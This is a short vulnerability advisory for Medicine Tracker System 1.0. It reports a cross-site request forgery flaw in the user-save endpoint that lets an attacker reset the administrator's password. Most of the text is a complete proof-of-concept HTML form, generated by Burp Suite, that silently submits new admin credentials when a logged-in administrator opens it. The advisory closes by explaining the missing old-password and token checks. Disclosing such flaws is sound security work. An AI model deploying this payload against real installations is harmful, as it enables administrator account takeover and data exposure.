Medicine Tracker System - 1.0
https://www.sourcecodester.com/users/tips23
/php-mts/classes/Users.php?f=save_user
Medicine Tracker System has a CSRF vulnerability when changing the password. An attacker can trick the administrator into changing the administrator login password, causing system information to be leaked. Status: CRITICAL
POC Create CSRF POC by changing the password
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/php-mts/classes/Users.php?f=save_user" method="POST" enctype="multipart/form-data">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="firstname" value="123" />
<input type="hidden" name="middlename" value="123" />
<input type="hidden" name="lastname" value="123" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Administrator clicks to change password successfully
The password is changed here without verifying the original password or adding a random verification code, causing CSRF.
